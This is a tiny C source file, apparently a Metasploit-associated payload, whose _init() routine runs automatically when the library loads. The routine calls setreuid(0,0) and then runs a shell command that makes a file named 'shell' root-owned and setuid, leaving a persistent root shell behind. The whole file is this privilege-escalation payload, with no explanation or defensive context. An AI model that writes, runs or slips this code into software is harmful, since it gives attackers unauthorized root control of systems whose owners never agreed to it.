/*
	hdm[at]metasploit.com
*/

#include <stdio.h>
#include <stdlib.h>

void
_init()
{
	setreuid(0,0);
	system("chown root shell; chmod 4755 shell");
	exit(0);
}
